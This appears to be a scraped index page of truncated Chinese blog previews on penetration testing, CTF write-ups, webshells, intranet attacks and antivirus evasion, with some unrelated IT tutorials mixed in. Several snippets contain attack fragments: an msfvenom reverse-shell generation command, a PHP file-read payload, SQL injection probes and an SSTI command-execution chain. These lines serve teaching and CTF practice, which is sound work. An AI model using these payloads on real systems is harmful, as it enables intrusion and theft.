1.1 .Sql注入攻击原理 SQL注入漏洞可以说是在企业运营中会遇到的最具破坏性的漏洞之一，它也是目前被利用得最多的漏洞。要学会如何防御SQL注入，首先我们要学习它的原理。针对SQL注入的攻击行为可描述为通过在用户可控参数中注入SQL语法，破…

零基础入门网络安全，收藏这篇不迷茫【2022最新】

前言最近收到不少关注朋友的私信和留言，大多数都是零基础小友入门网络安全。其实看过的铁粉都知道，之前的文里是有过推荐过的。新来的小友可能不太清楚，这里就系统地叙述一遍。 01.简单了解一下网络安全说白了，网络安全就是指…

[VulnHub靶机渗透] dpwwn: 1

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏…

BUUCTF-Real-[Tomcat]CVE-2017-12615

目录漏洞描述一、漏洞编号：CVE-2017-12615 二、漏洞复现 get flag 漏洞描述 CVE-2017-12615：远程代码执行漏洞影响范围：Apache Tomcat 7.0.0 - 7.0.79 (windows环境) 当 Tomcat 运行在 Windows 操作系统时，且启用了 HTTP P…

CVE-2022-27925 Zimbra任意文件上传漏洞复现

目录 0x01 声明： 0x02 简介： 0x03 漏洞概述： 0x04 影响版本： 0x05 环境搭建： 环境准备： 环境搭建： 0x06 漏洞复现： 利用POC： 0x07 流量分析： 0x08 …

隐私计算技术创新赋能金融数字化转型

文章目录前言一、金融数据要素流通和价值发挥面临的挑战二、隐私计算技术助推金融场景建设向纵深发展（一）基于可验证秘密共享算法的跨机构数据联合统计（二）基于联邦半监督学习的沉睡客户挖掘模型（三）基于跨域数据校验算法的客户信息准确性验证（四）基于异构隐私计算平台…

寻找AD域替代或新建方案时，这里有企业标准统一身份建设新方法供参考

100-300人规模的企业处于企业生存及发展期，也是处在通过IT系统建设提升企业效率的时期，随着人员的增多，企业逐步发现混乱的身份账号管理给日常办公及生产活动造成管理及安全方面的困扰，于是企业开始着手统一身份体系的规划及选型&…

【misc】ctfshow--CTF的一生如履薄冰

解压的附件如下： 666.zip这个压缩包是要密码的，打开txt看一下这个应该spam encode了直接解密：spammimic - decode 解密结果为：hppy_n3w_y3ar_every_ctf3r_2024_g0g0g0!!!这个就是压缩包的密码，解压又是一个加密的…

文件上传-Webshell

Webshell简介 webshell就是以aspphpjsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页木马后门。攻击者可通过这种网页后门获得网站服务器操作权限，控制网站服务器以进行上传下载文件、查看数据库、执行命令等… 什么是木马 …

【华为 ICT HCIA eNSP 习题汇总】——题目集12

1、企业网络内部常常采用私有 IP 地址进行通信，以下哪个地址属于私有 IP 地址？ A、0.1.1.1 B、127.5.4.3 C、128.0.0.5 D、172.24.35.36 考点：网络层解析：（D） A类 IP 地址中，10.0.0.0 ~ 10.255…

申请SSL证书怎么进行域名验证？域名验证的三种方式

SSL证书是用于加密和保护Web服务器和浏览器之间通信的数字证书，在申请SSL证书时，为了防止域名被冒用，对于申请SSL证书的域名，要求先验证这个域名的所有权。而目前可用的域名验证SSL证书方式有三种：分别是DNS验证、邮箱…

SQL注入（SQL Injection）从注入到拖库 —— 简单的手工注入实战指南精讲

基本SQL注入步骤： 识别目标：确定目标网站或应用程序存在潜在的SQL注入漏洞。收集信息：通过查看页面源代码、URL参数和可能的错误信息等，搜集与注入有关的信息。判断注入点：确定可以注入的位置，比如输入框、…

红队打靶练习:GLASGOW SMILE: 1.1

目录信息收集 1、arp 2、nmap 3、nikto 4、whatweb 目录探测 1、gobuster 2、dirsearch WEB web信息收集 /how_to.txt /joomla CMS利用 1、爆破后台 2、登录 3、反弹shell 提权系统信息收集 rob用户登录 abner用户 penguin用户 get root flag 信息收集…

[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

查看网页有提示，参数是wllm，并且要我们输入点东西所以，我们尝试以get方式传入有回显，但似乎没啥用从上图看应该是字符型漏洞，单引号字符注入先查看字段数 /?wllm2order by 3-- 没回显报错了，说明…

CVE-2021-42013 漏洞复现

CVE-2021-42013 漏洞版本：Apache 2.4.50 Apache版本2.4.50是对CVE-2021-（版本2.4.49）的修复，但是修复不完整导致可以绕过，从而产生了CVE-2021-42013（版本2.4.50）。这时修复了对.%2e的检测。…

24个已知403绕过方法的利用脚本

介绍一个简单的脚本，仅供自用，用于绕过 403 在curl的帮助下使用24个已知的403绕过方法它还可用于比较各种条件下的响应，如下图所示用法 ./bypass-403.sh https://example.com admin ./bypass-403.sh website-here path-here 安装 git …

【Web】Redis未授权访问漏洞学习笔记

目录简介靶机配置 Redis持久化 Redis动态修改配置 webshell 反弹shell Redis写入反弹shell任务加固方案简介 Redis（Remote Dictionary Server 远程字典服务器）是一个开源的内存数据库，也被称为数据结构服务器，它支持…

渗透测试练习题解析 3（CTF web）

1、[网鼎杯 2020 朱雀组]phpweb 1 考点：反序列化漏洞利用进入靶场，查看检查信息，发现存在两个参数 func 和 p 查看页面源代码 payload：funcfile_get_contents&pphp://filter/resourceindex.php 整理后，就是 PHP 代…

从零开始学howtoheap：fastbins的house_of_spirit攻击2

how2heap是由shellphish团队制作的堆利用教程，介绍了多种堆利用技术，后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境：从零开始配置pwn环境：优化pwn虚拟机配置支持libc等指令-CSDN博客 1.fastbins的house_…

ctfshow-php特性(web102-web115)

目录 web102 web103 web104 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 实践是检验真理的要多多尝试 web102 <?php highlight_file(__FILE__); $v1$_POST[V1]; $v2$_GET[v2]; $v3$_GET[v3]; $v4is_numeric($v2)and is…

kali最新最简单安装

之前都是用iso镜像文件的今年好多东西都删库了，所有还是要主要资源的保存去官网找下载一般来说都是用虚拟机的下载完会是一个压缩文件， 解压，然后操作之前需要先下载虚拟机打开方式用虚拟机打开 kali就按装好了

《Git 简易速速上手小册》第3章：分支管理（2024 最新版）

文章目录 3.1 创建与合并分支3.1.1 基础知识讲解3.1.2 重点案例：为 Python 项目添加新功能3.1.3 拓展案例 1：使用 Pull Requests (PRs) 在团队中合作3.1.4 拓展案例 2：解决合并冲突 3.2 分支策略的最佳实践3.2.1 基础知识讲解3.2.2 重点案例&…

HGAME 2024 WEEK2 Web方向题解全

---------【WEEK-2】--------- What the cow say? 题目描述：the cow want to tell you something 注意title，Python的flask漏洞可多呢版本310 先测一下SSTI 正常情况下 SSTI测试变量渲染测试，被waf了，说明方向对了单单过滤…

CVE-2023-41892 漏洞复现

CVE-2023-41892 开题，是一个RCE Thanks for installing Craft CMS! You’re looking at the index.twig template file located in your templates/ folder. Once you’re ready to start building out your site’s front end, you can replace this with someth…

BossPlayerCTF

靶场环境问题靶场下载之后，可能会出现扫描不到IP的情况，需要进行调整，参考： Vulnhub靶机检测不到IP地址_vulnhub靶机nmap扫不到-CSDN博客该靶机没有vim，需要使用vi命令去修改；改成当前网卡即可&#x…

应急响应实战笔记02日志分析篇（3）

第3篇:Web日志分析 ox01 Web日志 Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析，不仅可以帮助我们定位攻击者，还可以帮助我们还原攻击路径，找到网站存在的安全漏洞并进行修复。我们来…

企业面临的网络安全风险及应对策略

网络安全威胁是一种技术风险，会削弱企业网络的防御能力，危及专有数据、关键应用程序和整个IT基础设施。由于企业面临着广泛的威胁，因此通过监控和缓解最关键的威胁和漏洞。网络安全问题有七大类，包括多种威胁，以及团队…

黑莓加大裁员力度，目标年利润再增1亿美元

近日，加拿大黑莓公司表示，今年的年利润再度增加 1 亿美元，为此将采取包括裁员在内的一系列降本措施。黑莓方面称，公司将在本季度进一步降低成本，并在网络安全业务上进行额外裁员，从而每年为公司节省约 2700…

汽车网络安全--关于供应商网络安全能力维度的思考

目录 1.关于CSMS的理解 2.OEM如何评审供应商 2.1 质量评审 2.2 网络安全能力评审 3.小结 1.关于CSMS的理解最近在和朋友们交流汽车网络安全趋势时，讨论最多的是供应商如何向OEM证明其网络安全能力。这是很重要的一环，因为随着汽车网络安全相关强…

SQL-Labs靶场“11-15”关通关教程

君衍. 一、十一关基于POST单引号字符型注入1、源码分析2、联合查询注入3、报错注入二、十二关基于POST双引号字符型注入1、源码分析2、联合查询注入3、报错注入三、十三关基于POST单引号报错注入变形1、源码分析2、报错注入四、十四关基于POST双引号报错注入1、源码分析…

华为配置旁挂二层组网隧道转发示例

配置旁挂二层组网隧道转发示例组网图形业务需求组网需求数据规划配置思路配置注意事项操作步骤配置文件扩展阅读业务需求企业用户通过WLAN接入网络，以满足移动办公的最基本需求。且在覆盖区域内移动发生漫游时，不影响用户的业务使用。组网需求 AC组…

ensp实验合集（二）

实验6 VLAN划分....................................................................... - 30 - 实验7 路由器调试及常用命令使用........................................ - 42 - 实验8 配置静态路由器............................................................…

《Python 网络爬虫简易速速上手小册》第4章：Python 网络爬虫数据抓取技术（2024 最新版）

文章目录 4.1 解析 HTML 与 CSS4.1.1 重点基础知识讲解4.1.2 重点案例：使用 BeautifulSoup 解析博客文章4.1.3 拓展案例 1：使用 lxml 和 XPath 解析产品信息4.1.4 拓展案例 2：动态加载内容的抓取挑战 4.2 动态内容抓取技术4.2.1 重点基础知识…

零基础如何入门渗透测试2024年最新版，保姆级教程，小白必看！

转眼间，从大三开始学安全，到现在也有五年了，也算是对渗透测试有一定理解，今天也是出一篇入门教程，以实操为主，希望可以帮助到想入门渗透测试的小白。如果觉得有用，可以给我点个赞和收藏&#xf…

vulnhub靶场实战系列（一）之vulnhub靶场介绍

vulnhub靶场介绍 Vulnhub是一个提供各种漏洞环境的靶场平台，供安全爱好者学习渗透使用，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，大多是…

防范恶意勒索攻击！亚信安全发布《勒索家族和勒索事件监控报告》

本周态势快速感知本周全球共监测到勒索事件81起，事件数量有所下降，比上月降低20%。 lockbit3.0仍然是影响最严重的勒索家族；akira和incransom也是两个活动频繁的恶意家族，需要注意防范。本周alphv勒索组织窃取MBC法律专业公司…

安全多方计算之五：零知识证明（从入门到入土。。）

零知识证明1. 简介2. 零知识证明的例子2.1 向红绿色盲证明红球、绿球2.2 数独的零知识证明2.3 三染色问题的零知识证明2.4 Quisquater-Guillou 零知识协议3. ElGamal加密的零知识证明3.1 ElGamal加密的已知明文证明3.2 ElGamal加密的二选一零知识证明3.3 ElGamal加密的1-out-of…

数百个模型放在面前，金融机构要如何高效管理

疫情推动金融机构加速数字化转型。依托人工智能、大数据等技术，金融机构建立各类模型，特别是以机器学习为代表的数据模型，被广泛运用在风险计量、客户准入、资本计量、拨备计提、客户管理、反洗钱、反欺诈、精准营销等领域。在用户行为模式改…

Java代码审计基础——RMI原理和反序列化利用链

目录 （一）何为RMI （二）、 RMI的模式与交互过程 0x01 设计模式 0x02 交互过程 0x03 Stub和Skeleton （三）简单的 RMI Demo 1、Server 2、Registry 3、Client 补充——动态类加载机制几个函数 (…

【Hack The Box】linux练习-- Previse

HTB 学习笔记【Hack The Box】linux练习-- Previse 🔥系列专栏：Hack The Box 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间：🌴2022年11月27日🌴 &#x1f…

DCN神州数码——DHCP相关操作指令（超详细）

DHCP服务器配置 service dhcp 启动DHCP 服务器或中继功能 ip dhcp pool pool1 network-address 1.1.1.1 24 default-router dns-server 8.8.8.8 domain-name dcn.com netbios-name-server 2.2.2.2 lease 5 ip dhcp excluded-address 2.2.2.2 创建DHCP地址池pool1配置地…

漏洞扫描的应用范围和场景

漏洞扫描服务范围安全漏洞扫描服务可以为客户提供包括网络设备、操作系统、数据库、常见应用服务器以及WEB应用等范围的扫描。漏洞扫描的详细服务范围如下： 操作系统 Windows、发行版Linux、AIX、UNIX通用、Solaris、FreeBSD、HP-UX、BSD等主流操作系统。数据…

2023年网络安全比赛--网络安全事件响应中职组（超详细）

一、竞赛时间 180分钟共计3小时二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值 1.黑客通过网络攻入本地服务器，通过特殊手段在系统中建立了多个异常进程，找出启动异常进程的脚本，并将其绝对路径作为Flag值提交; 2.黑客通过网络攻入本地服务器，通过特殊手段在系统…

网络安全概述

一、简介网络安全是指保护网络和其中存储的数据免受未经授权的访问、滥用、破坏、窃取和披露等各种威胁。随着网络在商业、政府和个人生活中的日益重要，保护网络和数据安全已成为一项关键任务。网络安全威胁包括病毒、恶意软件、黑客攻击、社交工程学攻击、网络钓鱼…

业务安全情报 | 数十万元的数据报告，竟被50元批量转售

近期监测到某咨询公司针数据报告大量泄漏事件，该机构历年的数据报告以及近期更新的针对VIP会员的付费报告均在电商等渠道可以低价获取。 BSL-2022-a3c28号情报文件显示黑灰产通过作弊方式获取查看、下载权限，绕过限制将报告数据大量下载，并通…

2023年网络安全比赛--JavaScript安全绕过中职组（超详细）

一、竞赛时间 180分钟共计3小时二、竞赛阶段 1.使用渗透机场景kali中工具扫描服务器，将服务器上apache版本号作为flag提交； 2.使用渗透机场景windows7访问服务其场景中的网站（网站路径为IP/javascript），找到网站首页中flag并提交； 3.使用渗透机场景windows7根据第二题的…

网络隔离后的文件传输怎么解决？深度解析4种主流方案

网络隔离对于很多企业来说并不陌生，出于数据安全的考虑，为了隔离有害的网络和可能的网络攻击，越来越多的企业在内部进行了网络隔离。隔离的形态和方式有多种，总体上主要以物理隔离和逻辑隔离为主。网络隔离可以一定程度上甚至彻底…

内网渗透(四)之基础知识-搭建域环境

系列文章内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点注：阅读本编文章前，请先阅读系列文章，以免造成看不懂的情况！！ 搭建域环境在…

隧道穿透：端口转发、socket隧道代理

目录端口转发 lcx工具 Lcx工具正向连接 Lcx工具反向连接 SOCKET隧道代理 socks常见利用场景 Proxifier SocksCap64 Proxychains 端口转发本篇会和搭建介绍一下端口转发和socket隧道代理的概念和简单演示 lcx工具 lcx工具是一个红队人员在内网渗透测试中最典型的端…

CTF-show WEB入门--web19

今晚web19也就顺便解决了老样子我们先打开题目看看题目提示： 可以看到题目提示为： 密钥什么的，就不要放在前端了然后我们打开题目链接： 然后我们查看网页源代码： 可以发现有用的内容全在网页源代码里。前端验证…

情报搜集神器：Spiderfoot 保姆级教程

一、介绍 SpiderFoot是一款开源的情报搜集和足迹分析工具，用于自动化收集有关目标的信息。它被设计为一种开放式情报（OSINT）工具，可以帮助安全专业人员、渗透测试人员和研究人员收集、分析和汇总来自互联网的信息。以下是 Spid…

（黑客攻击）如何通过 5 个步骤阻止 DDoS 攻击

有效阻止恶意流量的有用提示。任何网站管理员都努力在流量激增期间保持其网站正常运行。但您如何确定这些流量峰值是合法的？更重要的是，如果情况并非如此，我们应该如何应对？ 不幸的是，现实情况是 DDoS 攻击可能对大…

如何成为专业的恶意软件研究员

当今社会，不管任何一门技术，或者你从事任何一种职业，都需要掌握相关的知识，现代的技术其实就是以前称的“手艺”，大多数的手艺的学习和入门其实都并不需要太高的门槛，只要你肯学想学，有人教你&a…

BUUCTF misc 专题（47）[SWPU2019]神奇的二维码

下载附件，得到一张二维码图片，并用工具扫描（因为图片违规了，所以就不放了哈。工具的话，一般的二维码扫描都可以） swpuctf{flag_is_not_here}，（刚开始出了点小差错对不住各位师傅&am…

Shellcode免杀对抗(C/C++)

Shellcode C/C免杀，绕过360安全卫士、火绒安全、Defender C/C基于cs/msf的上线首先是测试一下shellcode上线，主要是俩种方法测试环境攻击机：kali2023 靶机：win10 msf方法首先是启动msf msfconsole 然后msf生成一个sh…

天翼云盘误封解决部分任务下载异常违反信安规则

背景从网上下载别人分享的文件，部分下载不了，提示部分任务下载异常，反复点重试在之前不成功的之中又成功了几个，然后就再也成功不了了，点进去发现提示违反信安规则。原因天翼云盘大概是有些信安规则，…

黑客利用F5 BIG-IP漏洞传播Linux挖矿病毒

漏洞简介 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。近日，F5的安全公告更新了BIG-IP，BIG-IQ中的多个严重漏洞，建议广大用户及时将F5 BIG-IP/BIG-IQ升级到最新版本，最…

9、内网安全-横向移动Exchange服务有账户CVE漏洞无账户口令爆破

用途：个人学习笔记，有所借鉴，欢迎指正！ 背景： 在内网环境的主机中，大部分部署有Exchange邮件服务，对于Exchange服务的漏洞也是频出，在这种情况下，如果拿到内网中一台主机…

防火墙——计算机网络

前述基于密码的安全机制不能有效解决以下安全问题： 用户入侵： 利用系统漏洞进行未授权登录； 授权用户非法获取更高级别权限等。软件入侵： 通过网络传播病毒、蠕虫和特洛伊木马。拒绝服务攻击等。解决方法： 防火墙&a…

CTFHub技能树web之RCE（二）

第五题：远程包含根据题目，使用远程包含进行打开phpinfo，可以看到allow_url_fopen和allow_url_include都是On，因此可以使用php://input，由于代码会检查file中的内容，因此不能够使用php://filter包含文件&a…

网络安全-一句话木马

声明遵纪守法请严格遵守网络安全法相关条例！ 此分享主要用于交流学习，请勿用于非法用途，一切后果自付。一切未经授权的网络攻击均为违法行为，互联网非法外之地。反制大家在知道了常规一句话的木马之后，就可以通…

SICTF Round#3 の WP

Misc 签到 SICTF{1f4ce05a-0fed-42dc-9510-6e76dff8ff53} Crypto [签到]Vigenere 附件内容： Gn taj xirly gf Fxgjuakd, oe igywnd mt tegbs mnrxxlrivywd sngearbsw wakksre. Bs kpimj gf tank, it bx gur bslenmngn th jfdetagur mt ceei yze Ugnled Lystel t…

[newstarctf2023] --RE wp

AndroGenshin: rc4加密表，base64换表： 脚本梭就行 python username b"genshinimpact" base64_table [125, 239, 101, 151, 77, 163, 163, 110, 58, 230, 186, 206, 84, 84, 189, 193, 30, 63, 104, 178, 130, 211,164, 94, 75, 16, 32, 33…

K8s安全一

Kubernetes是一个开源的，用于编排云平台中多个主机上的容器化的应用，目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署，规划，更新，维护的一种机制。其核心的特点就是能够自主的管理容器来保证云平台中的…

daydayEXP: 支持自定义Poc文件的图形化漏洞利用工具

daydayEXP: 支持自定义Poc文件的图形化漏洞利用工具基于java fx写的一款支持加载自定义poc文件的、可扩展的的图形化渗透测试框架。支持批量漏洞扫描、漏洞利用、结果导出等功能。使用经过测试，项目可在jdk8环境下正常使用。jdk11因为缺少一些必要的组件，所以jdk11版本工…

《网络安全笔记》第八章：计算机网络基本概念

一、计算机网络的基本概念 1、什么是计算机网络由两台或多台计算机通过网络设备进行串联（网络设备通过传输介质串联） 网络设备计算机路由交换防火墙上网行为管理…… 传输介质双绞线（网线）5类、6类、7类光纤无线（…

2022NISCTF--web

easyssrf 打开题目，显示的是尝试输入， 发现输入flag有东西读取文件访问下一个网站读取文件不能以file开头直接伪协议，base64解码 checkIn 奇怪的unicode编码当选中左边的时候右边也会被选中我们在vscode看看这样的额展示的是UTF-1…

通俗易懂！一文看懂手机Root的操作与防护

Root，对于任何手机发烧友、玩机客、从事移动设备研发的人员来说，并不陌生，它代表绝大部分移动设备的使用者能够掌握到的最高权限。从技术层次来讲，用户拥有了修改系统文件的权限，甚至可以控制账户、增加或删除硬件等…

【渗透测试】Weblogic系列漏洞

目录 🍺CVE-2017-10271（Weblogic XMLDecoder反序列化漏洞） 🍻1、漏洞原理 🍻2、影响版本 🍻3、漏洞验证 🍻4、修复方案 🍺CVE-2018-2628（Weblogic T3协议反序列化漏洞&am…

CSRF漏洞详解与挖掘

CSRF的定义： CSRF，全称Cross-site request forgery，翻译过来就是跨站请求伪造，是指利用受害者尚未失效的身份认证信息（cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面&#xf…

CVE-2022-1162 Gitlab 硬编码漏洞复现

目录 0x01 声明： 0x02 简介： 0x03 漏洞概述： 0x04 影响版本： 0x05 环境搭建： Docker环境搭建： 漏洞环境搭建： 创建文件拉取内容： 访问： Github配置&#xff…

网络安全阶段一学习笔记

本笔记来自温晓飞老师的网络安全课程目录1. 环境搭建2. IP地址详解3. 进制转换4. DOS基本命令与批处理5. 用户与组管理6. 服务器远程管理7. 破解系统密码8. NTFS安全权限9. 文件共享服务器10. 利用PE破解系统密码11. DHCP部署与安全12. DNS部署与安全13. WEB服务器和FTP服务器…

QA特辑|剪得断，理不乱，一场直播解开关联网络与反团伙欺诈谜团

11月 10 日下午15:00 第九期《关联网络技术在业务安全中的应用》正式开讲。顶象数据科学家翼龙详尽的介绍了关联网络在反团伙欺诈中的作用，深度剖析了关联网络的技术框架、关联网络的图谱构建以及关联网络的复杂算法，为反团伙欺诈提供了重要的参考。直播…

软考信息安全工程师必会--3000+字文章浅析DES加密算法

目录前言什么是DES加密算法整体流程 IP置换子密钥K 压缩置换1 循环左移拓展置换2 拓展置换E S盒代替 S1盒 S2盒 S3盒 S4盒 S5盒 S6盒 S7盒 S8盒 P盒置换末置换前言 🍀作者简介：被吉师散养、喜欢前端、学过后端、练过CTF、玩过DOS…

加解密与HTTPS（4）

您好，我是湘王，这是我的CSDN博客，欢迎您来，欢迎您再来～ 在互联网应用中，安全性问题已经越来越突出。从DDoS攻击、矿机劫持、乌云事件（白帽子变成黑帽子），到窃听、偷拍、强…

漏洞挖掘之信息收集

简介对单一指定目标网站进行黑盒测试，最重要的就是信息收集，因为网站管理员肯定会在用户经常访问的主网站进行经常维护，而那些子域名，没有什么人访问的，可能就会忘记维护，挖洞的突破点大都在于子域名上&am…

[MRCTF2020]Ezaudit（随机数的安全）

目录信息收集代码审计相关函数前提知识思路分析补充知识信息收集查看源代码没有发现有用信息，尝试dirmap扫下目录 python3 dirmap.py -i 网址 -lcf 扫描时发现一个www.zip目录下载到一份index.php文件，找到一个login.html <?php h…

《2023年电力安全监管重点任务》中的网络安全工作要求

近日，国家能源局综合司印发《2023年电力安全监管重点任务》（以下简称《重点任务》），明确电力安全监管目标，对今年的安全工作进行了部署。2023年电力安全监管目标是杜绝重大以上电力人身伤亡责任事故、杜绝重大以上电力…

内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希）

系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内网渗透(五)之基础知识-Active Directory活动目录介绍和使用内网渗透(六)之基…

OpenSSL发布修复程序以解决多个安全漏洞！

OpenSSL 项目已发布修复程序以解决多个安全漏洞，包括开源加密工具包中的一个高严重性错误，该错误可能会使用户遭受恶意攻击。国际知名白帽黑客、东方联盟创始人郭盛华表示，该问题被追踪为CVE-2023-0286，与类型混淆有关&#xff…

[ 常用工具篇 ] CobaltStrike(CS神器)基础(一) -- 安装及设置监听器详解

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动

系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内网渗透(五)之基础知识-Active Directory活动目录介绍和使用内网渗透(六)之基…

wpscan常见的使用方法

目录简单介绍暴力破解信息收集指定用户爆破命令集合简单介绍 Wordpress是一个以PHP和MySQL为平台的免费自由开源的博客软件和内容管理系统。 WPScan是Kali Linux默认自带的一款漏洞扫描工具，它采用Ruby编写，能够扫描WordPress网站中的多种安…

metasploit穷举模块

目录工具介绍常用模块参数介绍工具使用工具介绍 Metasploit框架(Metasploit Framework, MSF)是一个开源工具， 旨在方便渗透测试，它是由Ruby程序语言编写的模板化框架，具有很好的扩展性，便于渗透测试人员开发、使用定制的…

CTFSHOW愚人节2023 部分wp

web easy_signin url是base64编码后的文件名直接读个index.php 然后查看源码解码base64 easy_ssti 过滤了斜杠,不能访问根目录了,考虑手动拼接一个{{lipsum.__globals__.os.popen(lipsum.__globals__.__str__().__getitem__(34)~lipsum.__globals__.__str__().__getitem_…

https和ssl网关在各安全层面的应用场景及测评要点

1、https和https实现 SSL/TLS协议是独立的概念（这里的重点是https和ssl v**，关于ssl/tls协议就不展开说了），可以实现对基于TCP/UDP应用的安全保护，如https和sftp等。 https是其中应用非常广泛的一种，即Hype…

随着攻击者适应绕过零信任，公司在苦苦挣扎

商业情报公司 Gartner 表示，零信任安全方法有望减少威胁并降低成功攻击的破坏性，但公司不应期望实施零信任原则会很容易或阻止大多数攻击。虽然对零信任架构的兴趣很高，但目前只有大约 1% 的组织拥有满足零信任定义的成熟程序。该公司还估…

开学季，关于校园防诈骗宣传，如何组织一场微信线上答题考试

开学季，关于校园防诈骗宣传，如何组织一场微信线上答题考试如何组织一场微信线上答题考试在线考试是一种非常节约成本的考试方式，考生通过微信扫码即可参加培训考试，不受时间、空间的限制，近几年越来越受企事业单位以及…

网络安全攻防中，Rock-ON自动化的多功能网络侦查工具，Burpsuite被动扫描流量转发

网络安全攻防中，Rock-ON自动化的多功能网络侦查工具，Burpsuite被动扫描流量转发。 #################### 免责声明：工具本身并无好坏，希望大家以遵守《网络安全法》相关法律为前提来使用该工具，支持研究学习&#xff…

企业安全现状与未来趋势如何？

随着越来越多的第三方办公应用在企业的应用，以及越来越多的企业开始通过云计算、大数据、物联网等数字技术进行数字化转型，一些大企业几乎每秒就能产生上万条数据，这些数据都是企业的资产。但是，在各种办公软件应用、数字技术给企…

低版本jQuery导致XSS Nuclei FUZZ POC

目录 1.前言 2. Nuclei FUZZ jQuery XSS POC 3.漏洞验证 4.修复建议 1.前言我记得以前用那些漏扫工具时时常会报一个低版本jQuery的安全问题，当时还不会验证。直到有一天，它托梦给我。我悟了。低版本jQuery导致XSS POC文件文末获取。

Ubuntu20.04LTS设置DNS解析（解决系统重启DNS不生效的问题）

文章目录背景介绍解决方案背景介绍近期买了一台戴尔的工作站，搭建的是Ubuntu20.04系统，使用时发现Ubuntu20.04系统上网经常卡顿（上网方式是有线网，使用的千兆网口和千兆网线）。使用网速测试工具speedtest-cli进行了…

操作系统权限提升(二十四)之Linux提权-明文ROOT密码提权

系列文章操作系统权限提升(十八)之Linux提权-内核提权操作系统权限提升(十九)之Linux提权-SUID提权操作系统权限提升(二十)之Linux提权-计划任务提权操作系统权限提升(二十一)之Linux提权-环境变量劫持提权操作系统权限提升(二十二)之Linux提权-SUDO滥用提权操作系统权限…

什么叫个非对称加密？中间人攻击？数字签名?

非对称加密也称为公钥密码。就是用公钥来进行加密，撒子意思？ 非对称加密在对称加密中，我们只需要一个密钥，通信双方同时持有。而非对称加密需要4个密钥，来完成完整的双方通信。通信双方各自准备一对公钥和私钥。其中…

Me-and-My-Girlfriend-1靶场通关

Me-and-My-Girlfriend-1靶场通关靶机ip:192.168.112.135 信息收集端口：22、80 还是从80WEB服务器端口入手对服务器目录进行扫描，扫出以下目录访问80端口WEB服务，显示一段文字只允许本地用户访问。一眼伪造ip，查看页面…

再获认可！腾讯安全NDR获Forrester权威推荐

近日，国际权威研究机构Forrester发布最新研究报告《The Network Analysis And Visibility Landscape, Q1 2023》（以下简称“NAV报告”），从网络分析和可视化（NAV）厂商规模、产品功能、市场占有率及重点案例等…

黑客入门教程【非常详细】从零基础入门到精通，看这一篇就够了！

首先要明白啊，我们现在说的黑客不是那种窃取别人信息、攻击别人系统的黑客，说的是调试和分析计算机安全系统的网络安全工程师。黑客技术的核心就是渗透攻防技术，是为了证明网络防御按照预期计划正常运行而提供的一种机制。就是通过模拟恶意…

网络安全行业现在好混吗，工资水平怎么样？

前段时间看到有人私信：网络安全行业现在好混吗，工资水平怎么样？今天在这里做个回答，不知你所说的“好混吗”指的是什么？ 薪资高，待遇好？不加班，活儿少？不受气&#xff0…

后渗透之缓冲区溢出实验

目录一、实验项目名称二、实验目的三、实验内容四、实验环境五、实验步骤六、实验结果七、实验总结一、实验项目名称后渗透之缓冲区溢出实验二、实验目的 1.掌握metasploit framework的使用方法 2.掌握“永恒之蓝”漏洞的利用方法三、实验内容通过对…

OSPFv3实验

OSPFv3实验拓扑图![在这里插入图片描述](https://img-blog.csdnimg.cn/e1bc2788be72416694af29ec9b3f405d.png)设备命令及解释测试效果拓扑图其中AR1和AR2属于区域0，AR2、3属于区域1，AR4使用静态路由的方式访问AR1的loopback接口。设备命令及解释 A…

WPA-hashcat渗透

WPA-hashcat渗透严重声明:cpu加速都是幌子，aricrack-ng也用cpu，不然用爱跑的？ 1.hashcat介绍 Hashcat系列软件是比较牛逼的密码破解软件,HashCat主要分为三个版本：Hashcat、oclHashcat-plus、oclHashcat-lite。这三个版本的…

正奇学苑游学活动走进腾讯腾讯安全持续共建生态助力创新企业成长

3月11日，正奇学苑与腾讯安全共同举行“正奇学苑走进腾讯交流沙龙”，共60余名安全行业创业者来到了深圳腾讯总部开展系列游学活动。据悉，正奇学苑-安全创业营由赛博英杰董事长谭晓生创办，旨在搭建安全行业交流平台，为安…

windows渗透(sam、system文件导出)

通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试，并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交；通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服

windows提权之BypassUACDLL劫持引号路径服务权限提权

0x01 bypassuac提权UAC是一个账户访问控制，运行一些程序时，会提醒是否运行这个程序一.msf绕过uac环境：win10，win7 管理员用户组的用户#生成木马 msfvenom -p windows/meterpreter/reverse_tcp lport4444 lhost192.168.85.129 -f e…

安卓虚拟机安装

